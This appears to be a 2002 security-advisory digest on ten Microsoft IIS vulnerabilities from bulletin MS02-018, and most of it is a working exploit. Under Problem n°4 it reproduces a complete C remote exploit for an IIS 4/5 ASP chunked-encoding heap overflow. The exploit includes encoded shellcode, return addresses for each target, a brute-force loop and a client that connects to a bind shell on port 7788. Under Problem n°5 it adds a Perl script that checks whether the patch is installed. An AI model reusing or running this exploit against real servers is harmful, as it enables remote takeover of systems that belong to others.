26th Sep 2002 [SBWID-5257]
COMMAND
IIS multiple buffer overflow and cross site scripting
SYSTEMS AFFECTED
IIS 4.0, 5.0, 5.1, 6.0 All releases and patched version till 11 April
2002
PROBLEM
Editor's note
=============
In this hudge advisory Microsoft disclose up to 10 different
vulnerabilities affecting all releases of IIS, for which a summary
table is provided below. At least one of those (.htr remote overflow
that could lead to remote access of the server) was discovered by an
independant research group [http://www.atstake.com] in February 2002,
undisclosed until today ...
See: [http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-018.asp]
Additional note (24 June 2002) : can you see a similarity with bug
n°2/3 and the recent posts about Apache ??
Summary of vulnerabilities / IIS versions
=========================================
Note :
====
IIS 6.0 is not present here, since considered a beta version Microsoft
will not disclose bug details for it. I.e : you should NOT use a .NET
platform in production environment ...
|IIS IIS IIS|
|4.0 5.0 5.1|
---------------------------------------------------------------+---+---+---|
Buffer overrun in Chunked Encoding mechanism |Yes Yes No |
| |
Microsoft-discovered variant of Chunked Encoding buffer overrun|Yes Yes Yes|
| |
Buffer Overrun in HTTP Header handling |Yes Yes Yes|
| |
Buffer Overrun in ASP Server-Side Include Function |Yes Yes Yes|
| |
Buffer overrun in HTR ISAPI extension |Yes Yes No |
| |
Access violation in URL error handling |Yes Yes Yes|
| |
Denial of service via FTP status request |Yes Yes Yes|
| |
Cross-site Scripting in IIS Help File search |No Yes Yes|
| |
Cross-site Scripting in HTTP Error Page |Yes Yes Yes|
| |
Cross-site Scripting in Redirect Response message |Yes Yes Yes|
Problem n°1
===========
Buffer overrun in Chunked Encoding mechanism
A buffer overrun vulnerability involving the operation of the chunked
encoding transfer mechanism via Active Server Pages in IIS 4.0 and 5.0.
An attacker who exploited this vulnerability could overrun heap memory
on the system, with the result of either causing the IIS service to
fail or allowing code to be run on the server.
See report by eeye [http://www.eeye.com] in file provided below.
Update (06 May 2002)
======
The UUencoded archive (reports.zip.uue) below, has been updated with an
exploit to this bug provided by CHINANSL Security Team
[http://www.chinansl.com]
Problem n°2
===========
Microsoft-discovered variant of Chunked Encoding buffer overrun
This one is related to the preceding one, but which lies elsewhere
within the ASP data transfer mechanism. It could be exploited in a
similar manner as the preceding vulnerability, and would have the same
scope. However, it affects IIS 4.0, 5.0, and 5.1.
Problem n°3
===========
Buffer Overrun in HTTP header handling
A buffer overrun involving how IIS 4.0, 5.0 and 5.1 process HTTP header
information in certain cases. IIS performs a safety check prior to
parsing the fields in HTTP headers, to ensure that expected delimiter
fields are present and in reasonable places. However, it is possible to
spoof the check, and convince IIS that the delimiters are present even
when they are not. This flaw could enable an attacker to create an URL
whose HTTP header field values would overrun a buffer used to process
them.
credit goes to entrust [http://www.entrust.com].
Problem n°4
===========
Buffer Overrun in ASP Server-Side Include Function
A Microsoft-discovered buffer overrun vulnerability in IIS 4.0, 5.0 and
5.1 that results from an error in safety check that is performed during
server-side includes. In some cases, a user request for a web page is
properly processed by including the file into an ASP script and
processing it. Prior to processing the include request, IIS performs an
operation on the user-specified file name, designed to ensure that the
file name is valid and sized appropriately to fit in a static buffer.
However, in some cases it could be possible to provide a bogus,
extremely long file name in a way that would pass the safety check,
thereby resulting in a buffer overrun.
Exploit : (24 June 2002)
=========
/*
* DDK - 2k2 -
*
*
* coded by NeMeS||y tnx to Birdack
*
*
*/
// IIS 4(NT4) - IIS 5(2K) .asp bof
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#define RET_BRUTE_START 0x00400000
#define RET_BRUTE_STOP 0x00500000
#define PORT_BIND 7788
#define VERSION "0.3b"
unsigned char wincode[] =
"\xeb\x18\x5f\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x05"
"\x34\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe3\xff\xff\xff\xff"
"\x21\x46\x30\x6b\x46\xea\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x6a\x30"
"\x9c\x55\x55\x13\xfa\xa8\xaa\xaa\x12\x66\x66\x66\x66\x59\x30\x41"
"\x6d\x30\x6f\x30\x46\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\x9e"
"\x5d\x55\x55\xba\xaa\xaa\xaa\x43\x48\xac\xaa\xaa\x30\x65\x30\x6f"
"\x30\x42\x5d\x55\x55\x27\x17\x5e\x5d\x55\x55\xce\x30\x4b\xaa\xaa"
"\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x30\x6f\x5e"
"\x5d\x55\x55\x55\x55\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29"
"\x42\xad\x23\x30\x6f\x52\x5d\x55\x55\x6d\x30\x6f\x30\x4e\x5d\x55"
"\x55\xaa\xaa\x4a\xdd\x42\xd4\xac\xaa\xaa\x29\x17\x30\x46\x5d\x55"
"\x55\xaa\xa5\x30\x6f\x77\xab\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55"
"\x30\x6b\x6b\xaa\xaa\xab\xaa\x23\x27\x30\x4e\x5d\x55\x55\x30\x6b"
"\x17\x30\x4e\x5d\x55\x55\xaa\xaa\xaa\xd2\xdf\xa0\x6d\x30\x6f\x30"
"\x4e\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x30\x7f\x30\x4e\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x30\x6f\x30\x70\xab"
"\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55\x21\xfb\x96\x21\x30\x6f\x30"
"\x4e\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba\x30\x6b\x53\xfa\xef\xaa"
"\xaa\xa5\x30\x6f\xd3\xab\xaa\xaa\x21\x30\x7f\x30\x4e\x5d\x55\x55"
"\x21\xe8\x96\x21\x27\x30\x4e\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x30"
"\x7f\x30\x4e\x5d\x55\x55\x23\x30\x7f\x30\x4a\x5d\x55\x55\x21\x30"
"\x6f\x30\x4a\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x30\x4e\x5d\x55\x55"
"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x30\x6b\x90"
"\xe1\xef\xf8\xe4\xa5\x30\x6f\x99\xab\xaa\xaa\x21\x30\x6f\x36\x5d"
"\x55\x55\x30\x6b\xd2\xae\xef\xe6\x99\x98\xa5\x30\x6f\x8a\xab\xaa"
"\xaa\x21\x27\x30\x4e\x5d\x55\x55\x23\x27\x3e\x5d\x55\x55\x21\x30"
"\x7f\x30\x4a\x5d\x55\x55\x21\x30\x6f\x30\x4e\x5d\x55\x55\xa9\xe8"
"\x8a\x23\x30\x6f\x36\x5d\x55\x55\x6d\x30\x6f\x32\x5d\x55\x55\xaa"
"\xaa\xaa\xaa\x41\xb4\x21\x27\x32\x5d\x55\x55\x29\x6b\xab\x23\x27"
"\x32\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x29\x68\xae\x23\x30"
"\x7f\x36\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\x27\x32"
"\x5d\x55\x55\x91\xe2\xb2\xa5\x27\x6a\xaa\xaa\xaa\x21\x30\x7f\x36"
"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\x96\xab"
"\xed\xcf\xde\xfa\xa5\x30\x6f\x30\x4a\xaa\xaa\xaa\x21\x30\x7f\x36"
"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\xd6\xab"
"\xae\xd8\xc5\xc9\xeb\xa5\x30\x6f\x30\x6e\xaa\xaa\xaa\x21\x30\x7f"
"\x32\x5d\x55\x55\xa9\x30\x7f\x32\x5d\x55\x55\xa9\x30\x7f\x30\x4e"
"\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\xe2\x8e\x99\x6a"
"\xcc\x21\xae\xa0\x23\x30\x6f\x36\x5d\x55\x55\x21\x27\x30\x4a\x5d"
"\x55\x55\x21\xfb\xba\x21\x30\x6f\x36\x5d\x55\x55\x27\xe6\xba\x55"
"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f"
"\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d"
"\x55\x55\xa9\x30\x7f\x30\x4e\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d"
"\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x30\x7f\x36\x5d\x55\x55\x21"
"\x30\x6f\x36\x5d\x55\x55\xa9\x30\x6f\x30\x4e\x5d\x55\x55\x23\x30"
"\x6f\x30\x46\x5d\x55\x55\x41\xaf\x43\xa7\x55\x55\x55\x43\xbc\x54"
"\x55\x55\x27\x17\x5e\x5d\x55\x55\x21\xed\xa2\xce\x30\x49\xaa\xaa"
"\xaa\xaa\x29\x17\x30\x46\x5d\x55\x55\xaa\xdf\xaf\x43\xdf\xae\xaa"
"\xaa\x21\x27\x30\x42\x5d\x55\x55\xcc\x21\xbb\xcc\x23\x30\x7f\x86"
"\x5d\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29\x6a\xa8\x23\x30"
"\x6f\x30\x42\x5d\x55\x55\x6d\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa"
"\xaa\x41\xa5\x21\x27\x36\x5d\x55\x55\x29\x6b\xab\x23\x27\x36\x5d"
"\x55\x55\x29\x17\x36\x5d\x55\x55\xbb\xa5\x27\x30\x7f\xaa\xaa\xaa"
"\x29\x17\x36\x5d\x55\x55\xa2\xdf\xb4\x21\x5e\x21\x30\x7f\x30\x42"
"\x5d\x55\x55\xf8\x55\x30\x7f\x1e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x23\x30\x6f\x3e\x5d\x55\x55\x41\x80\x21\x5e\x21\x30\x6f"
"\x30\x42\x5d\x55\x55\xfa\x21\x27\x3e\x5d\x55\x55\xfb\x55\x30\x7f"
"\x30\x46\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x30\x7f\x36"
"\x5d\x55\x55\x23\x30\x6e\x30\x7f\x1a\x5d\x55\x55\x41\xa5\x21\x30"
"\x6f\x30\x42\x5d\x55\x55\x29\x6a\xab\x23\x30\x6f\x30\x42\x5d\x55"
"\x55\x21\x27\x30\x42\x5d\x55\x55\xa5\x14\xbb\x30\x6f\x78\xdf\xba"
"\x21\x30\x6f\x30\x42\x5d\x55\x55\xa5\x14\xe2\xab\x30\x6f\x63\xde"
"\xa8\x41\xa8\x41\x78\x21\x30\x7f\x30\x42\x5d\x55\x55\x29\x68\xab"
"\x23\x30\x7f\x30\x42\x5d\x55\x55\x43\xe5\x55\x55\x55\x21\x5e\xc0"
"\xac\xc0\xab\xc0\xa8\x55\x30\x7f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9"
"\xe1\xe9\xe1\x23\x30\x6f\xe6\x5d\x55\x55\xcc\x6d\x30\x6f\x92\x5d"
"\x55\x55\xa8\xaa\xcc\x21\x30\x6f\x86\x5d\x55\x55\xcc\x23\x30\x6f"
"\x90\x5d\x55\x55\x6d\x30\x6f\x96\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d"
"\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa\xaa\x29\x17\x36\x5d\x55\x55"
"\xaa\xde\xf5\x21\x5e\xc0\xba\x27\x27\x92\x5d\x55\x55\xfb\x21\x30"
"\x7f\xe6\x5d\x55\x55\xf8\x55\x30\x7f\x72\x5d\x55\x55\x91\x5e\x3a"
"\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\xcc\x21\x30\x6f\x90"
"\x5d\x55\x55\xcc\xaf\xaa\xab\xcc\x23\x30\x6f\x90\x5d\x55\x55\x21"
"\x27\x90\x5d\x55\x55\x30\x6b\x4b\x55\x55\xaa\xaa\x30\x6b\x53\xaa"
"\xab\xaa\xaa\xd7\xb8\xcc\x21\x30\x7f\x90\x5d\x55\x55\xcc\x29\x68"
"\xab\xcc\x23\x30\x7f\x90\x5d\x55\x55\x41\x32\x21\x5e\xc0\xa0\x21"
"\x30\x6f\xe6\x5d\x55\x55\xfa\x55\x30\x7f\x76\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x13\xab\xaa\xaa\xaa\x30\x6f\x63\xa5\x30\x6e"
"\x6c\xa8\xaa\xaa\x21\x5e\x27\x30\x7f\x9e\x5d\x55\x55\xf8\x27\x30"
"\x6f\x92\x5d\x55\x55\xfa\x21\x27\xe6\x5d\x55\x55\xfb\x55\x30\x7f"
"\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\xe2\x5d"
"\x55\x55\x6d\x30\x6f\xaa\x5d\x55\x55\xa6\xaa\xaa\xaa\x6d\x30\x6f"
"\xae\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\xa2\x5d\x55\x55\xab"
"\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27"
"\x30\x6f\xbe\x5d\x55\x55\xfa\x27\x27\xb2\x5d\x55\x55\xfb\x55\x30"
"\x7f\x12\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x5e\xc0\xaa"
"\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27\x30\x6f\xa6\x5d\x55\x55\xfa"
"\x27\x27\xba\x5d\x55\x55\xfb\x55\x30\x7f\x12\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x27\x17\xfa\x5d\x55\x55\x99\x6a\x13\xbb\xaa"
"\xaa\xaa\x58\x30\x41\x6d\x30\x6f\xd6\x5d\x55\x55\xab\xab\xaa\xaa"
"\xcc\x6d\x30\x6f\x2a\x5d\x55\x55\xaa\xaa\x21\x30\x7f\xba\x5d\x55"
"\x55\x23\x30\x7f\x22\x5d\x55\x55\x21\x30\x6f\xbe\x5d\x55\x55\x23"
"\x30\x6f\x26\x5d\x55\x55\x21\x27\xbe\x5d\x55\x55\x23\x27\x3a\x5d"
"\x55\x55\x21\x5e\x27\x30\x7f\xb6\x5d\x55\x55\xf8\x27\x30\x6f\xfa"
"\x5d\x55\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa"
"\x21\x27\x30\x42\x5d\x55\x55\xfb\xc0\xaa\x55\x30\x7f\x16\x5d\x55"
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\x21"
"\x5e\xc0\xaa\xc0\xaa\x27\x30\x7f\x9a\x5d\x55\x55\xf8\xc2\xaa\xae"
"\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xb2\x5d\x55\x55"
"\xfb\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x30"
"\x50\xab\xaa\xaa\xaa\x30\x6f\x78\xa5\x30\x6e\xdf\xab\xaa\xaa\x21"
"\x5e\xc0\xaa\xc0\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\xc2\xaa\xae"
"\xaa\xaa\x27\x27\xaa\x52\x55\x55\xfb\x21\x30\x7f\xb2\x5d\x55\x55"
"\xf8\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
"\x17\x9a\x5d\x55\x55\xaa\xa5\x24\x30\x6e\xaa\xaa\xaa\x21\x5e\xc0"
"\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\x21\x27\x9a\x5d\x55\x55\xfb"
"\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xb2\x5d\x55\x55\xfa"
"\x55\x30\x7f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29\x17"
"\x9a\x5d\x55\x55\xaa\xd4\x82\x21\x5e\xc0\xaa\x21\x27\x9a\x5d\x55"
"\x55\xfb\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xe2\x5d\x55"
"\x55\xfa\x55\x30\x7f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1"
"\x41\x8b\x21\x5e\xc0\xaa\xc0\xa2\x21\x27\x30\x42\x5d\x55\x55\xfb"
"\x21\x30\x7f\xe2\x5d\x55\x55\xf8\x55\x30\x7f\x4e\x5d\x55\x55\x91"
"\x5e\x3a\xe9\xe1\xe9\xe1\x43\x18\xaa\xaa\xaa\x21\x5e\xc0\xaa\xc2"
"\xaa\xae\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xe2\x5d"
"\x55\x55\xfb\x55\x30\x7f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x23\x30\x6f\x9a\x5d\x55\x55\x29\x17\x9a\x5d\x55\x55\xaa\xd5"
"\xf8\x6d\x30\x6f\x9a\x5d\x55\x55\xac\xaa\xaa\xaa\x21\x5e\xc0\xaa"
"\x27\x30\x7f\x9a\x5d\x55\x55\xf8\x21\x30\x6f\x9a\x5d\x55\x55\xfa"
"\x21\x27\x30\x42\x5d\x55\x55\x29\x6b\xa2\xfb\x21\x30\x7f\xa6\x5d"
"\x55\x55\xf8\x55\x30\x7f\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x21\x5e\x21\x30\x6f\xe2\x5d\x55\x55\xfa\x55\x30\x7f\x5a\x5d"
"\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x41\x98\x21\x5e\xc0\xaa\x27"
"\x27\x9a\x5d\x55\x55\xfb\x21\x30\x7f\x9a\x5d\x55\x55\xf8\x27\x30"
"\x6f\xaa\x52\x55\x55\xfa\x21\x27\xa6\x5d\x55\x55\xfb\x55\x30\x7f"
"\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\xd4\x54\x55\x55"
"\x43\x87\x57\x55\x55\x41\x54\xf2\xfa\x21\x17\x30\x42\x5d\x55\x55"
"\x23\xed\x58\x69\x21\xee\x8e\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee"
"\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\xb3\x53\x55\x55\xb4\xc6\xe6"
"\xc5\xcb\xce\xe6\xc3\xc8\xd8\xcb\xd8\xd3\xeb\xaa\xe9\xd8\xcf\xcb"
"\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde\xcf\xfa\xd8\xc5"
"\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce\xc6"
"\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa"
"\xf8\xcf\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3"
"\xc6\xcf\xaa\xdd\xd9\xc5\xc9\xc1\x99\x98\x84\xce\xc6\xc6\xaa\xd9"
"\xc5\xc9\xc1\xcf\xde\xaa\xc8\xc3\xc4\xce\xaa\xc6\xc3\xd9\xde\xcf"
"\xc4\xaa\xcb\xc9\xc9\xcf\xda\xde\xaa\xd9\xcf\xc4\xce\xaa\xd8\xcf"
"\xc9\xdc\xaa\xc3\xc5\xc9\xde\xc6\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9"
"\xc6\xc5\xd9\xcf\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9\xc7\xce\x84\xcf"
"\xd2\xcf\xaa\xcf\xd2\xc3\xde\xa7\xa0\xaa";
struct{
int def;
char *descr;
unsigned int ret;
unsigned int rewrite;
int port;
char path[256];
}target[] = {
{0, " IIS5 Windows 2000 by hsj", 0x0045C560, 0x77eaf44c, 80, "/iisstart.asp"},
{1, " IIS5 Windows 2000 Chinese SP0 - SP1", 0x0045C560, 0x77ec044c, 80, "/iisstart.asp"},
{2, " IIS5 Windows 2000 Chinese SP2", 0x0045C560, 0x77ebf44c, 80, "/iisstart.asp"},
{3, " IIS5 Windows 2000 English SP2", 0x0045C560, 0x77edf44c, 80, "/iisstart.asp"},
{4, " IIS4 Windows NT4", 0, 0, 80, "/iisstart.asp"},
{666, NULL, 0, 0, 0, NULL}
};
int sel = 0;
int resolve (char *IP);
int make_connection(char *address,int port);
int open_back(char *host,int port);
void l33thax0r(int sock);
void usage(char *name);
int main(int argc, char **argv)
{
int i, j, cnt, sock;
int brute = 0;
unsigned int step;
unsigned char *shell_port_offset;
char buf[8192], buf2[16384], host[1024];
unsigned int ret_start, ret_stop, ret_step, ret_1;
fprintf(stderr, "\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit "
"- DDK Crew 2k2 - (version "VERSION")\n"
" by NeMeS||y and Birdack\n\n");
if(argc == 1) usage(argv[0]);
while((cnt = getopt(argc,argv,"h:t:p:f:b:")) != EOF)
{
switch(cnt)
{
case 'h':
strncpy(host, optarg, sizeof(host));
host[sizeof(host) - 1] = '\x00';
break;
case 't':
sel = atoi(optarg);
break;
case 'p':
sscanf(optarg, "%p", &target[sel].port);
break;
case 'f':
strncpy(target[sel].path, optarg, sizeof(&target[sel].path));
target[sel].path[sizeof(&target[sel].path) -1] = '\x00';
break;
case 'b':
brute = 1;
step = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(target[sel].def == 4) brute = 1; // ;>
sock = make_connection(host,target[sel].port);
if(sock<0)
{
printf("Error -> [ %d ] not connected.\n\n",sock);
return -3;
}
if(brute==0)
{
ret_start = target[sel].ret;
ret_step = 1;
ret_stop = target[sel].ret;
} else {
ret_start = RET_BRUTE_START;
ret_step = step;
ret_stop = RET_BRUTE_STOP;
}
printf("\n [+] Start\n\n host\t->\t%s\n port\t->\t%d\n path\t->\t%s\n type\t->\t%s\n\n\n",
host, target[sel].port, target[sel].path, target[sel].descr);
if(brute==1) printf("\n [+] Brute forcing enabled... do u have time?\n\n");
for(ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step)
{
for(i=0;i<sizeof(buf)-strlen(wincode)-12-1;)
{
buf[i++] = 0xeb;
buf[i++] = 0x06;
}
*(unsigned int *)&buf[i] = 0x41414141;
*(unsigned int *)&buf[i+4] = 0x41414141;
*(unsigned int *)&buf[i+8] = 0x41414141;
memcpy(&buf[sizeof(buf)-strlen(wincode)-1],wincode,strlen(wincode));
buf[sizeof(buf)-1] = 0;
sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Transfer-Encoding: chunked\r\n\r\n"
"10\r\nDDKDDKDDKDDKDD\r\n"
"4\r\nRETT\r\n"
"4\r\nREWR\r\n"
"0\r\n\r\n\r\n",
&target[sel].path,buf);
*(unsigned int *)strstr(buf2,"REWR") = &target[sel].rewrite;
*(unsigned int *)strstr(buf2,"RETT") = ret_1;
if(brute==0) printf(" # Sending buffer to socket : ");
write(sock,buf2,strlen(buf2));
fprintf(stderr, " [+] ret : 0x%08lx ->",ret_1);
sleep(3);
if(brute==0) printf("DONE!\n\n");
shutdown(sock,2);
close(sock);
printf(" # connecting to our shell - port : [ %d ]\n",PORT_BIND);
sock=open_back(host,PORT_BIND);
if(sock==-1 && brute==0)
{
printf("\n [-] FAILED ");
printf("exiting now!\n\n");
exit(-1);
}
if(sock!=-1)
{
printf("\n\n[+] Address guessed!! \n\n");
printf("...OH oH OH... done! our evilcode has worked baby at [ %d ]\n", ret_1);
l33thax0r(sock);
exit(0);
}
}
}
int resolve (char *IP)
{
struct hostent *info;
unsigned long ip;
if ((ip=inet_addr(IP))==-1)
{
if ((info=gethostbyname(IP))==0)
{
printf("Couldnt resolve [%s]\n", IP);
exit(0);
}
memcpy(&ip, (info->h_addr), 4);
}
return (ip);
}
int make_connection(char *address,int port)
{
struct sockaddr_in server,target;
int s,i,bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
memset((char *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
errno = bf;
return -5;
}
ioctl(s,FIONBIO,&bf);
return s;
}
int open_back(char *host,int port)
{
int sock, err;
struct sockaddr_in server_addr;
struct hostent *he;
he=gethostbyname(host);
if (he == NULL) return -1;
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
server_addr.sin_addr.s_addr = resolve(host);
sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1) return -1;
err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
if (err == -1) sock = -1;
return sock;
}
void l33thax0r(int sock)
{
char buf[1024];
fd_set rset;
int i;
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
i=read(sock,buf,1024);
if (i <= 0)
{
printf("Fuck... the connection was closed!\n");
printf("exiting...\n\n");
exit(0);
}
buf[i]=0;
puts(buf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
i=read(STDIN_FILENO,buf,1024);
if (i>0)
{
buf[i]=0;
write(sock,buf,i);
}
}
}
}
void usage(char *name)
{
int j = 0;
printf("Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\n", name);
printf("\nOptions:\n"
" -h hostname (www.iisvictim.com)\n"
" -t target\n"
" -p port (default 80)\n"
" -f path_file (default /iisstart.asp)\n"
" -b step (brute force, try step 2000)\n\n"
"Available targets:\n\n");
while(target[j].def != 666)
{
printf(" %d ] - %s -\n", target[j].def, target[j].descr);
j++;
}
printf("\n");
exit(1);
}
Problem n°5
===========
Buffer overrun in HTR ISAPI extension
A buffer overrun affecting the HTR ISAPI extension in IIS 4.0 and 5.0.
By sending a series of specially malformed HTR requests, it could be
possible to either cause the IIS service to fail or, under a very
difficult operational scenario, to cause code to run on the server.
See report by @Stake [http://www.atstake.com] in file provided below.
Microsoft IIS .HTR heap overflow checker by Filip Maertens
[http://filip.compsec.be] (added 25 April 2002) :
#!/usr/bin/perl
########################################################################
# (c) Filip Maertens/CISSP, .HTR Heap Overflow checker.
#
# DISCLAIMER: This tool is only to be used for legitimate purposes only.
# This is considered as an intrusive, so please adhere to the laws and
# regulations applicable in your country. Oh, and honey, there is pizza
# in the fridge...
#
# CREDITS: @stake/KPMG for the advisory
# Thor Larholm for the patch identification remark
#
########################################################################
use Socket;
print "iischeck.pl | Microsoft .HTR Heap Overflow Checker | <filip\@securax.be>\n-----------------------------------------------------------------------\n";
$host= @ARGV[ 0 ];
$method= @ARGV[ 2 ];
my $target = inet_aton($host);
$port = 80;
$requestmethod[0] = "GET";
$requestmethod[1] = "HEAD";
$requestmethod[2] = "POST";
# Initializing strings & vars
$patchedstring = "InsertElementAnchor";
$nonpatchedstring = "document.write";
$bogusurl = "/xxxiischeckxxx";
# Main loop of rotten code
if ($host ne "") {
print " -- Checking hostname: $host\n";
$rawrequest = "$requestmethod[$method] $bogusurl HTTP/1.1\nClient-Agent:iischeck.pl\nHost:$host\r\n\r\n";
@results = sendrequestandgetanswer($rawrequest);
$criticalline = $results[49]; # 49, since HTTP headers are included
if ($results[2] =~ "IIS") {
SWITCH: {
if ($criticalline =~ $nonpatchedstring) { $patched = " -- Status: System vulnerable."; last SWITCH; }
if ($criticalline =~ $patchedstring) { $patched = " -- Status: System MS02-18 patched."; last SWITCH; }
$patched = " -- Status: Cannot identify patch level";
}
print "$patched\n\n";
} else {
print " -- Error: System is not a Windows/IIS host.\n\n";
}
} else {
showusage();
}
exit(0);
#######: Functions used by iischeck.pl :#######
sub showusage
{
print "Usage: iischeck [hostname] -method [method]\n";
}
sub sendrequestandgetanswer
{
my ($rawrequest)= @_;
@lines = sendrawandgetanswer ($rawrequest);
return @lines;
}
sub sendrawandgetanswer
{
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') || 0) || die(" -- Error in creating socket\n");
if (connect(S,pack "SnA4x8",2,$port,$target))
{
my @in="";
select(S);
$|=1;
print $pstr;
while(<S>)
{
push @in,$_;
last if ($line=~ /^[\r\n]+$/ );
}
select(STDOUT);
return @in;
}
else
{
die(" -- Error connecting to: $host\n");
}
}
sub sendraw
{
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') || 0) || die("Socket problems\n");
if (connect(S,pack "SnA4x8",2,$port,$target))
{
my @in="";
select(S);
$|=1;
print $pstr;
}
